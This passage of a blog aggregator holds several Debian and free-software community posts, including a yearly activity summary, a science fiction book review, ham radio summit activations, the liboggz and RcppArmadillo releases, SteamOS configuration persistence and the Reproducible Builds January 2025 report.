fairly big advance forward last year, partly because I have been poking and begging package maintainers and upstream developers to include AppStream metadata XML in their packages. I've also released a few new versions of the isenkram system with some robustness improvements. Today 127 packages in Debian provide such information, allowing isenkram-lookup to propose them. Will keep pushing until the around 35 package names currently hard coded in the isenkram package are down to zero, so only information provided by individual packages is used for this feature. As part of the work on AppStream, I have sponsored several packages into Debian where the maintainer wanted to fix the issue but lacked direct upload rights. I've also sponsored a few other packages, when approached by the maintainer. I would also like to mention two hardware related packages in particular where I have been involved, the megactl and mfi-util packages. Both work with the hardware RAID systems in several Dell PowerEdge servers, and the first one is already available in Debian (and of course, proposed by isenkram when used on the appropriate Dell server); the other has been waiting for NEW processing since this autumn. I manage several such Dell servers and would like the tools needed to monitor and configure these RAID controllers to be available from within Debian out of the box. Vaguely related to hardware support in Debian, I have also been trying to find ways to help out the Debian ROCm team, to improve the support in Debian for my artificial idiocy (AI) compute node. So far I have only uploaded one package, helped test the initial packaging of llama.cpp and tried to figure out how to get good speech recognition like Whisper into Debian. I am still involved in the LinuxCNC project, and organised a developer gathering in Norway last summer. A new one is planned for the summer of 2025.
I've also helped evaluate patches and uploaded new versions of LinuxCNC into Debian. After a 10-year-long break, we managed to get a new and improved upstream version of lsdvd released just before Christmas. As I use it regularly to maintain my DVD archive, I was very happy to finally get out a version supporting DVDDiscID, useful for uniquely identifying DVDs. I am dreaming of an Internet service mapping DVD IDs to IMDB movie IDs, to make life as a DVD collector easier. My involvement in Norwegian archive standardisation and the free software implementation of the vendor neutral Noark 5 API continued for the entire year. I've been pushing patches into both the API and the test code for the API, participated in several editorial meetings regarding the Noark 5 Tjenestegrensesnitt specification, and submitted several proposals for improvements to the same. We also organised a small seminar for Noark 5 interested people, and are organising a new seminar in a month. Part of the year was spent working on and coordinating a Norwegian Bokmål translation of the marvellous children's book Ada and Zangemann, which focuses on the right to repair and control your own property, and the value of controlling the software on the devices you own. The translation is mostly complete, and is now waiting for a transformation of the project and manuscript to use DocBook XML instead of a home-made semi-text-based format. Great progress is being made and the new book build process is almost complete. I have also been looking at how companies in Norway can use free software to report their accounting summaries to the Norwegian government. Several new regulations make it very hard for companies to use free software for accounting, and I would like to change this. Found a few drafts for opening up the reporting process, and have read up on some of the specifications, but nothing much is working yet. These were just the tip of the iceberg, but I guess this blog post is long enough now. If you would like to help with any of these projects, please get in touch, either directly on the project mailing lists and forums, or with me via email, IRC or Signal. :) As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

Russ Allbery: Review: The Scavenger Door

Review: The Scavenger Door, by Suzanne Palmer
Series: Finder Chronicles #3
Publisher: DAW
Copyright: 2021
ISBN: 0-7564-1516-0
Format: Kindle
Pages: 458
The Scavenger Door is a science fiction adventure and the third book of the Finder Chronicles. While each of the books of this series stands alone reasonably well, I would still read the series in order. Each book has some spoilers for the previous book. Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To get him out of their hair, his cousin sends him into the Scottish hills to find a friend's missing flock of sheep. Fergus finds things professionally, but usually not livestock. It's an easy enough job, though; the lead sheep was wearing a tracker and he just has to get close enough to pick it up. The unexpected twist is also finding a metal fragment buried in a hillside that has some strange resonance with the unwanted gift that Fergus got in Finder. Fergus's alien friend Ignatio is so alarmed by the metal fragment that he turns up in person in Fergus's cousin's bar in Scotland. Before he arrives, Fergus gets a mysteriously infuriating warning visit from alien acquaintances he does not consider friends. He has, as usual, stepped into something dangerous and complicated, and now somehow it's become his problem. So, first, we get lots of Ignatio, who is an enthusiastic large ball of green fuzz with five limbs who mostly speaks English but does so from an odd angle. This makes me happy because I love Ignatio and his tendency to take things just a bit too literally.
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS. "Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?" "Oh, no, I am not missing this," Isla said, and got out of the podcar. "I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"
Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened." "And then?" "And then the bad things on the other side, who we were trying to lock away, will be free to travel through."
Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun. The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments. We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well. There are also more sentient ships, and I am so in favor of more sentient ships.
"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."
We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into. There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts. Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly. This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended. Followed by Ghostdrift. Rating: 9 out of 10

9 February 2025

Dave Hibberd: Radio Activity 10-16 Feb 2025

It's been quite the week of radio-related nonsense for me, where I've been channelling my time and brainspace for radio into activity on air and system refinements, not working on Debian.

POTA, Antennas and why do my toys not work?

Having had my interest piqued by Ian at mastodon.radio, I looked online and spotted a couple of parks within stumbling distance of my house; that's good news! It looks like the list has been refactored and expanded since I last looked at it, so there are now more entities to activate and explore. My concerns about antennas noted last week rumbled on. There was a second strand to this concern too: my end fed 64:1 (or 49:1?!) transformer from MM0OPX sits in my mind as not having worked very well in Spain last year, and I want to get to the bottom of why. As with most things in my life, it's probably a me problem. I came up with a cunning plan - firstly, buy a new mast to replace the one I broke a few weeks back on Cat Law. Secondly, buy a couple of new connectors and some heatshrink to reterminate my cable that I'm sure is broken. Spending more money on a problem never hurt anyone, right? Come Wednesday, the new toys arrived and I figured combining everything into one convenient night time walk and radio was a good plan. So I walk out to the nearest park with my LoRa APRS doofer going and see what happens:

[APRS map]

After circling a bit to find somewhere suitable (there appear to be construction works in the park!) I set up my gear in 2°C with frost on the ground, called CQ, spotted and got nothing on either the end fed half wave or the cheap vertical. As it was too late for 20m, I tried 40 and a bit of 80 using the inbuilt tuner, but wasn't heard by stations I called or when calling independently. I packed everything up and lora-doofered my way home, mildly deflated.

Try it at home

It still didn't sit right with me that the end fed wasn't working, so come Friday night I set it up in the back garden/woods behind the house to try and diagnose why. Up it went, I worked some Irish stations pretty effortlessly, and down everything came. No complaints - the only things I did differently were having the feedpoint a little higher and checking my power, limiting it to 10W. The G90 can do 20W; I wonder if running at that was saturating the core in the 64:1. At some point in the evening I stepped in some dog's shit too, and spent some time cleaning my boots outside to avoid further tramping the smell through the house. Win some, lose some.

Take it to the Hills

On Friday, some of the other GM/ES SOTA-ists had been out for an activity day. On account of me being busy with work, I couldn't go outside to play, but I figured a weekend of activity was on the books.

Saturday - A day above the clouds

On Saturday I took myself up Tap O' Noth, a favourite of mine for some reason, and Lord Arthur's Hill. Before I hit the hills, I took myself to the hackerspace and printed myself a K6ARK winder and a guy ring for the mast, cut string, tied it together and wound the string on to the winder. I also took time to buzz out my wonky coax and it showed great continuity. Hmm, that can be continued later. I didn't quite get to crimping the radial network of the Aliexpress whip with a 12mm stud crimp; that can also be put on the TODO list.

Tap O' Noth

Once finally out, the weather was a bit cloudy with passing snow showers, but in between the showers I was above the clouds and the air was clear. After a mild struggle on 2m, I set up the end fed on the first hill and got to work from the old hill fort. The end fed worked flawlessly. Exactly as promised, switching between 7MHz, 14MHz, 21MHz and 28MHz without a tuner was perfect; I chased hills on all the bands and had a great time. Apart from 40m, where there was absolutely no space due to a contest. That wasn't such a fun time! My fingers were bitterly cold, so on went the big gloves for the descent and I felt like I was warm by the time I made it back to the car. It worked so well, in fact, I took the cheap 1/4 wave vertical out of my bag and decided to brave it on the next activation.

Lord Arthur's Hill

GM5ALX has posted a .gpx to sotlas which is shorter than the other ascent, but much sharper - I figured this would be a fun new way to try up the hill! It takes you right through the heart of the Littlewood Park estate, and I felt a bit uncomfortable walking straight past the estate cottages, especially when there were vehicles moving and active work happening. Presumably this is where Lord Arthur lived, at the foot of his hill. I cut through the woods to the west of the cottages, disturbing some deer and many, many pheasants, but I met the path fairly quickly. From there it was a 2km walk, 300m vertical ascent. Short and sharp! At the top, I was treated to a view of the hill I had activated only an hour or so before, which is a view that always makes me smile. To get some height for the feedpoint, I wrapped the coax around my winder a couple of turns and trapped it with the elastic while draping the coax over the trig. This bought me some more height and I felt clever because of it. Maybe a pole would be easier? From here, I worked inter-G on 40m and had a wee pile up, eventually working 15 or so European stations on 20m. Pleased with that! I had been considering a third hill, but home was the call in the failing light. Back at the car, I found my key didn't have any battery, so out came the Audi app and I used the Internet of Things to unlock my car. The modern world is bizarre.

Sunday - Cloudy Head // Head in the Clouds

Sunday started off migrainey, so I stayed within the confines of my house until I felt safe driving! After some back and forth in my cloudy head, I opted for the easier option of Ladylea Hill, as I wasn't feeling up for major physical exertion. It was a long drive, after which I felt more wonky, but I hit the path eventually - I run to Hibby Standard Time, a few hours to a few days behind the rest of GM/ES. I was ready to bail if my head didn't improve, but it turns out fresh cold air, silence and bloodflow helped. Ladylea Hill was incredibly quiet, a feature I really appreciated. It feels incredibly remote, with a long winding drive down Glenbuchat, which still has ice on the surface of the lochs and standing water. A brooding summit crowned with grey cloud in fantastic scenery that only revealed itself upon the clouds blowing through. I set up at the cairn and picked up 30 contacts overall, split between 40m and 20m, with some inter-G on 40 and a couple of continental surprises. 20 had longer skip today, so I saw Spain, Finland, Slovenia, Poland. On teardown, I managed to snap the top segment of my brand new mast with my cold, clumsy fingers, but thankfully SOTABeams stock replacements. More money at the problem, again. Back to the car, no app needed, and homeward bound as the light faded. At the end of the weekend, I find myself finally over 100 activator points and over 400 chaser points. Somehow I've collected more points this year already than last year; the winter bonuses really do stack up!

Addendum - OSMAnd & OpenStreetMap I've been using OSMAnd on my iPhone quite extensively recently; I think offline mapping is super important if you're going out to get mildly lost in the hills. On more than one occasion, I have confidently set off in the wrong direction in the mist, and maps have saved my bacon! As you can download .gpx files, it's great to have them on the device and available for guidance in case you get lost, coupled with an offline map. Plus, as I drive around I love to have the dark red of a hill I've walked appear on the map in my car dash or in my hand: This weekend I discovered it's possible to have height maps for nice 3D maps and contours marked on the map - you just need to download some additions for the maps. This is a really nice feature; it makes maps prettier and more useful when you're in the middle of nowhere. OpenStreetMap also has designators for SOTA summits here, and similar for POTA here. GM5ALX has set about adding the summits around Scotland here. While the benefits aren't immediately obvious, it allows developers of mapping applications access to more data at no extra cost, really. It helps add depth to an already rich set of information, and allows us as radio amateurs to do more interesting things with maps and not be shackled to Apple/Google. Because it's open data, we can also fix things we find wrong as users. I like to fix road surfaces after I've been cycling, as that will feed forward to route planning through Komoot and the data on my Wahoo too, which can be modified with OSM maps. In the future, it's possible to have an OSMAnd plugin highlighting local SOTA summits or mimicking features of sotl.as but offline (the query sketch below shows the kind of data such a plugin could pull). It's cool to be able to put open technologies to use like this in the field and it really is the convergence point of all my favourite things!
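As a sketch of what that open data makes possible: the Overpass API can pull SOTA-tagged summits straight out of OSM. The tag name below follows the OSM wiki's amateur-radio tagging and the bounding box is an illustrative corner of Aberdeenshire, so treat this as a starting point rather than gospel:

    curl -s 'https://overpass-api.de/api/interpreter' \
      --data-urlencode 'data=[out:json][timeout:25];
        node["communication:amateur_radio:sota"](57.0,-3.5,57.5,-2.5);
        out body;'

Each returned node carries the summit reference alongside its coordinates, so an offline plugin would only need to cache a result like this next to the map data.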

Petter Reinholdtsen: New oggz release 1.1.2 after 15 years

A little over a week ago, I noticed the liboggz package on my Debian dashboard had not had a new upstream release for a while. A closer look showed that its last release, version 1.1.1, happened in 2010. A few patches had accumulated in the Debian package, and I even noticed that I had passed on these patches to upstream five years ago. A handful of crash bugs had been reported against the Debian package, and looking at the upstream repository I even found a few crash bugs reported there too. To add insult to injury, I discovered that upstream had accumulated several fixes in the years between 2010 and now, and many of them had not made their way into the Debian package. I decided enough was enough, and that a new upstream release was needed to fix these nasty crash bugs. Luckily I am also a member of the Xiph team, aka upstream, and could actually go to work immediately to fix it. I started by adding automatic build testing on the Xiph gitlab oggz instance, to get a better idea of the state of affairs with the code base. This exposed a few build problems, which I had to fix. In parallel to this, I sent an email announcing my wish for a new release to every person who had committed to the upstream code base since 2010, and asked for help doing a new release both by email and on the #xiph IRC channel. Sadly only a fraction of their email providers accepted my email. But Ralph Giles in the Xiph team came to the rescue and provided invaluable help to guide me through the Xiph release process. While this was going on, I spent a few days tracking down the crash bugs with good help from valgrind, and came up with patch proposals to get rid of at least these specific crash bugs. The open issues also had to be checked. Several of them proved to be fixed already, but a few I had to create patches for. I also checked out the Debian, Arch, Fedora, SUSE and Gentoo packages to see if there were patches applied in these Linux distributions that should be passed upstream. The end result was ready yesterday. A new liboggz release, version 1.1.2, was tagged, wrapped up and published on the project page. And today, the new release was uploaded into Debian. You are probably by now curious about what actually changed in the library. I guess the most interesting new feature was support for Opus and VP8. Almost all other changes were stability or documentation fixes. The rest were related to the gitlab continuous integration testing. All in all, this was really a minor update, hence the version bump only from 1.1.1 to 1.1.2, but it was long overdue and I am very happy that it is out the door. One change proposed upstream was not included this time, as it extended the API and changed some of the existing library methods, and would thus require a major SONAME bump and possibly code changes in every program using the library. As I am not that familiar with the code base, I am unsure if I am the right person to evaluate the change. Perhaps later. Since the release was tagged, a few minor fixes have been committed upstream already: automatic testing of cross-building to Windows, and documentation updates linking to the correct project page. If an important issue is discovered with this release, I guess a new release might happen soon including these minor fixes. If not, perhaps they can wait fifteen years. :)
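For the curious, the crash hunting itself involved nothing exotic. A typical run over one of the liboggz command line tools looks something like this (the input file name is a stand-in for the crashing samples from the bug reports):

    # Run one of the oggz tools under valgrind; --track-origins helps
    # trace invalid reads back to the allocation or write that caused them.
    valgrind --track-origins=yes --error-exitcode=1 \
        oggz-dump crashing-sample.ogg

Once valgrind points at the offending function, writing a minimal patch proposal is a much smaller job.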
I would like to send a big thank you to everyone who helped make this release happen, from the people adding fixes upstream over the course of fifteen years, to the ones reporting crash bugs and other bugs, and those maintaining the package in various Linux distributions. Thank you very much for your time and interest. As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

8 February 2025

Thorsten Alteholz: My Debian Activities in January 2025

Debian LTS This was my hundred-twenty-seventh month of doing some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. During my allocated time I uploaded or worked on: As new CVEs for ffmpeg appeared, I started working again on an update of this package. Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting. Debian ELTS This month was the seventy-eighth ELTS month. During my allocated time I uploaded or worked on: As new CVEs for ffmpeg appeared, I started working again on an update of this package. Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting. Debian Printing This month I uploaded new packages or new upstream or bugfix versions of: This work is generously funded by Freexian! Debian Matomo This month I uploaded new packages or new upstream or bugfix versions of: This work is generously funded by Freexian! Debian Astro This month I uploaded new packages or new upstream or bugfix versions of: Patrick, our Outreachy intern for the Debian Astro project, is doing very well and deals with task after task. He is working on automatic updates of the indi 3rd-party drivers, and maybe the results of his work will already be part of Trixie. Debian IoT Unfortunately I didn't find any time to work on this topic. Debian Mobcom This month I uploaded new packages or new upstream or bugfix versions of: misc This month I uploaded new upstream or bugfix versions of: FTP master This month I accepted 385 and rejected 37 packages. The overall number of packages that got accepted was 402.

Erich Schubert: Azul's State-of-Java report is nonsense

Azul's State-of-Java report is full of nonsense, and not worth looking at. The report makes various claims about the adoption of AI in the Java ecosystem. But its results do not make any sense when looked at in detail. For example (in the AI section): I can only guess that people picked some random plausible answer, but were not actually using any of that. Probably because of bad incentives:
Participants were offered token compensation for their participation.
Seems like Dimensional Research, the company that did that survey, screwed up badly.

6 February 2025

Dirk Eddelbuettel: RcppArmadillo 14.2.3-1 on CRAN: Small Upstream Fix

armadillo image Armadillo is a powerful and expressive C++ template library for linear algebra and scientific computing. It aims towards a good balance between speed and ease of use, has a syntax deliberately close to Matlab, and is useful for algorithm development directly in C++, or quick conversion of research code into production environments. RcppArmadillo integrates this library with the R environment and language and is widely used by (currently) 1215 other packages on CRAN, downloaded 38.2 million times (per the partial logs from the cloud mirrors of CRAN), and the CSDA paper (preprint / vignette) by Conrad and myself has been cited 612 times according to Google Scholar. Conrad released a minor version 14.2.3 yesterday. As it has been two months since the last minor release, we prepared a new version for CRAN too which arrived there early this morning. The changes since the last CRAN release are summarised below.

Changes in RcppArmadillo version 14.2.3-1 (2025-02-05)
  • Upgraded to Armadillo release 14.2.3 (Smooth Caffeine)
    • Minor fix for declaration of xSYCON and xHECON functions in LAPACK
    • Fix for rare corner-case in reshape()

Courtesy of my CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the Rcpp R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

Dominique Dumont: Drawbacks of using Cookiecutter with Cruft

Hi Cookiecutter is a tool for building coding project templates. It's often used to provide scaffolding to build lots of similar projects. I've seen it used to create Symfony projects and several cloud infrastructures deployed with Terraform. This tool was useful to accelerate the creation of new projects. Since these templates were bound to evolve, the teams providing these templates relied on cruft to update the code provided by the template in their users' code (see the short sketch at the end of this post). In other words, they wanted their users to apply a diff of the template modifications to their code. At the beginning, all was fine. But problems began to appear during the lifetime of these projects. What went wrong? In both cases, we had the following scenario: User teams giving up on updates is a major problem, because these updates may bring security or compliance fixes. Note that code conflicts seen with cruft are similar to git merge conflicts, but harder to resolve because, unlike with a git merge, there's no common ancestor, so 3-way merges are not possible. From an organisation point of view, the main problem is the ambiguous ownership of the functionality brought by template code: who owns this code? The provider team who writes the template, or the user team who owns the repository of the code generated from the template? Conflicts are bound to happen. Possible solutions to get out of this tar pit: Of course your users won't be happy to be faced with a manual migration from the old big template to the new one with external dependencies. On the other hand, this may be easier to sell than updates based on cruft, since the painful work will happen once. Further updates will be done by incrementing dependency versions (which can be automated with renovate). If many projects are to be created with this template, it may be more practical to provide a CLI that will create a skeleton project. See for instance the terragrunt scaffold command. My name is Dominique Dumont, I'm a devops freelancer. You can find the devops and audit services I propose on my website or reach out to me on LinkedIn. All the best
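For readers who have not used cruft, the update workflow discussed above boils down to two commands. A minimal sketch, assuming the project was generated with cruft create (or adopted with cruft link):

    # Check whether the project still matches its template...
    cruft check
    # ...and apply the template's diff to the project. Conflicting hunks
    # are the pain point described above and must be resolved by hand.
    cruft update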

5 February 2025

Alberto García: Keeping your system-wide configuration files intact after updating SteamOS

Introduction If you use SteamOS and you like to install third-party tools or modify the system-wide configuration, some of your changes might be lost after an OS update. Read on for details on why this happens and what to do about it.
As you all know, SteamOS uses an immutable root filesystem and users are not expected to modify it, because all changes are lost after an OS update. However this does not apply to configuration files: the /etc directory is not part of the root filesystem itself. Instead, it's a writable overlay and all modifications are actually stored under /var (together with all the usual contents that go in that filesystem such as logs, cached data, etc). /etc contains important data that is specific to that particular machine, like the configuration of known network connections, the password of the main user and the SSH keys. This configuration needs to be kept after an OS update so the system can keep working as expected. However the update process also needs to make sure that other changes to /etc don't conflict with whatever is available in the new version of the OS, and there have been issues due to some modifications unexpectedly persisting after a system update. SteamOS 3.6 introduced a new mechanism to decide what to keep after an OS update, and the system now keeps a list of configuration files that are allowed to be kept in the new version. The idea is that only the modifications that are known to be important for the correct operation of the system are applied, and everything else is discarded [1]. However, many users want to be able to keep additional configuration files after an OS update, either because the changes are important for them or because those files are needed for some third-party tool that they have installed. Fortunately the system provides a way to do that, and users (or developers of third-party tools) can add a configuration file to /etc/atomic-update.conf.d, listing the additional files that need to be kept. There is an example in /etc/atomic-update.conf.d/example-additional-keep-list.conf that shows what this configuration looks like.
Sample configuration file for the SteamOS updater
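A minimal sketch of how a third-party tool might hook into this (the target file name is illustrative; copy the actual syntax from the shipped example rather than from here):

    # Read the format Valve ships, then add your own keep-list next to it:
    cat /etc/atomic-update.conf.d/example-additional-keep-list.conf
    sudo cp /etc/atomic-update.conf.d/example-additional-keep-list.conf \
            /etc/atomic-update.conf.d/my-tool-keep-list.conf
    # ...then edit my-tool-keep-list.conf to list the /etc files to preserve.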
Developers who are targeting SteamOS can also use this same method to make sure that their configuration files survive OS updates. As an example of an actual third-party project that makes use of this mechanism you can have a look at the DeterminateSystems Nix installer: https://github.com/DeterminateSystems/nix-installer/blob/v0.34.0/src/planner/steam_deck.rs#L273 As usual, if you encounter issues with this or any other part of the system you can check the SteamOS issue tracker. Enjoy!
  [1] A copy is actually kept under /etc/previous to give the user the chance to recover files if necessary, and up to five previous snapshots are kept under /var/lib/steamos-atomupd/etc_backup.

Reproducible Builds: Reproducible Builds in January 2025

Welcome to the first report in 2025 from the Reproducible Builds project! Our monthly reports outline what we've been up to over the past month and highlight items of news from elsewhere in the world of software supply-chain security when relevant. As usual, though, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. Table of contents:
  1. reproduce.debian.net
  2. Two new academic papers
  3. Distribution work
  4. On our mailing list
  5. Upstream patches
  6. diffoscope
  7. Website updates
  8. Reproducibility testing framework

reproduce.debian.net The last few months saw the introduction of reproduce.debian.net. Announced at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project. rebuilderd is our server designed to monitor the official package repositories of Linux distributions and attempt to reproduce the observed results there. This month we are pleased to announce that, in addition to the existing amd64.reproduce.debian.net and i386.reproduce.debian.net architecture-specific pages, we now build for three more architectures (for a total of five): arm64, armhf and riscv64.

Two new academic papers Giacomo Benedetti, Oreofe Solarin, Courtney Miller, Greg Tystahl, William Enck, Christian Kästner, Alexandros Kapravelos, Alessio Merlo and Luca Verderame published an interesting article recently. Titled An Empirical Study on Reproducible Packaging in Open-Source Ecosystem, the abstract outlines its optimistic findings:
[We] identified that with relatively straightforward infrastructure configuration and patching of build tools, we can achieve very high rates of reproducible builds in all studied ecosystems. We conclude that if the ecosystems adopt our suggestions, the build process of published packages can be independently confirmed for nearly all packages without individual developer actions, and doing so will prevent significant future software supply chain attacks.
The entire PDF is available online to view.
In addition, Julien Malka, Stefano Zacchiroli and Théo Zimmermann of Télécom Paris's in-house research laboratory, the Information Processing and Communications Laboratory (LTCI), published an article asking the question: Does Functional Package Management Enable Reproducible Builds at Scale?. Answering strongly in the affirmative, the article's abstract reads as follows:
In this work, we perform the first large-scale study of bitwise reproducibility, in the context of the Nix functional package manager, rebuilding 709,816 packages from historical snapshots of the nixpkgs repository[. We] obtain very high bitwise reproducibility rates, between 69 and 91% with an upward trend, and even higher rebuildability rates, over 99%. We investigate unreproducibility causes, showing that about 15% of failures are due to embedded build dates. We release a novel dataset with all build statuses, logs, as well as full diffoscopes: recursive diffs of where unreproducible build artifacts differ.
As above, the entire PDF of the article is available to view online.

Distribution work There has been the usual work in various distributions this month, such as:
  • 10+ reviews of Debian packages were added, 11 were updated and 10 were removed this month, adding to our knowledge about identified issues. A number of issue types were updated as well.
  • The FreeBSD Foundation announced that a planned project to deliver zero-trust builds began in January 2025. Supported by the Sovereign Tech Agency, this project is centered on the various build processes; the primary goal of this work is to enable the entire release process to run without requiring root access, and to have build artifacts build reproducibly, that is, such that a third party can build bit-for-bit identical artifacts. The full announcement can be found online, and includes an estimated schedule and other details.

On our mailing list On our mailing list this month:
  • Following up on a substantial amount of previous work pertaining to the Sphinx documentation generator, James Addison asked a question about the relationship between the SOURCE_DATE_EPOCH environment variable and testing, which generated a number of replies.
  • Adithya Balakumar of Toshiba asked a question about whether it is possible to make ext4 filesystem images reproducible. Adithya's issue is that even the smallest amount of post-processing of the filesystem results in the modification of the Last mount and Last write timestamps.
  • James Addison also investigated an interesting issue surrounding our disorderfs filesystem. In particular:
    FUSE (Filesystem in USErspace) filesystems such as disorderfs do not delete files from the underlying filesystem when they are deleted from the overlay. This can cause seemingly straightforward tests (for example, cases that expect directory contents to be empty after deletion is requested for all files listed within them) to fail.
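For context, disorderfs is normally used to shake out directory-ordering assumptions in reproducibility tests. A minimal sketch of such a session (the deletion caveat is the one reported above, not a guaranteed behaviour of every FUSE filesystem):

    mkdir underlying overlay
    # Present 'underlying' at 'overlay' with nondeterministic directory order:
    disorderfs --shuffle-dirents=yes underlying overlay
    touch overlay/a overlay/b
    rm overlay/*            # per the report above, the files may survive in
    ls underlying           # 'underlying' even after removal via the overlay
    fusermount -u overlay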

Upstream patches The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:

diffoscope diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 285, 286 and 287 to Debian:
  • Security fixes:
    • Validate the --css command-line argument to prevent a potential Cross-site scripting (XSS) attack. Thanks to Daniel Schmidt from SRLabs for the report. [ ]
    • Prevent XML entity expansion attacks. Thanks to Florian Wilkens from SRLabs for the report. [ ][ ]
    • Print a warning if we have disabled XML comparisons due to a potentially vulnerable version of pyexpat. [ ]
  • Bug fixes:
    • Correctly identify changes to only the line-endings of files; don't mark them as Ordering differences only. [ ]
    • When passing files on the command line, don't call specialize() before we've checked whether the files are identical or not. [ ]
    • Do not exit with a traceback if paths are inaccessible, either directly, via symbolic links or within a directory. [ ]
    • Don't cause a traceback if cbfstool extraction failed. [ ]
    • Use the surrogateescape mechanism to avoid a UnicodeDecodeError and crash when decoding zipinfo output that is not UTF-8 compliant. [ ]
  • Testsuite improvements:
    • Don't mangle newlines when opening test fixtures; we want them untouched. [ ]
    • Move to assert_diff in test_text.py. [ ]
  • Misc improvements:
    • Drop unused subprocess imports. [ ][ ]
    • Drop an unused function in iso9660.py. [ ]
    • Inline a call and check of Config().force_details; no need for an additional variable in this particular method. [ ]
    • Remove an unnecessary return value from the Difference.check_for_ordering_differences method. [ ]
    • Remove unused logging facility from a few comparators. [ ]
    • Update copyright years. [ ][ ]
In addition, fridtjof added support for the ASAR .tar-like archive format [ ][ ][ ][ ]. Lastly, Vagrant Cascadian updated diffoscope in GNU Guix to version 285 [ ][ ] and 286 [ ][ ].
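For anyone who has not run the tool by hand, a typical invocation is short (file names illustrative; --html selects the report format whose --css option the XSS fix above concerns):

    # Compare two builds of the same package and write an HTML report:
    diffoscope --html report.html \
        package_1.0-1_amd64.deb package_1.0-1_amd64.rebuild.deb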
strip-nondeterminism is our sister tool to remove specific non-deterministic results from a completed build. This month version 1.14.1-1 was uploaded to Debian unstable by Chris Lamb, making the following changes:
  • Clarify the --verbose and non --verbose output of bin/strip-nondeterminism so we don't imply we are normalizing files that we are not. [ ]
  • Bump Standards-Version to 4.7.0. [ ]

Website updates There were a large number of improvements made to our website this month, including:

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In January, a number of changes were made by Holger Levsen, including:
  • reproduce.debian.net-related:
    • Add support for rebuilding the armhf architecture. [ ][ ]
    • Add support for rebuilding the arm64 architecture. [ ][ ][ ][ ]
    • Add support for rebuilding the riscv64 architecture. [ ][ ]
    • Move the i386 builder to the osuosl5 node. [ ][ ][ ][ ]
    • Don't run our rebuilders on a public port. [ ][ ]
    • Add database backups on all builders and add links. [ ][ ]
    • Rework and dramatically improve the statistics collection and generation. [ ][ ][ ][ ][ ][ ]
    • Add contact info to the main page [ ], thumbnails [ ] as well as the new, missing architectures. [ ]
    • Move the amd64 worker to the osuosl4 node. [ ]
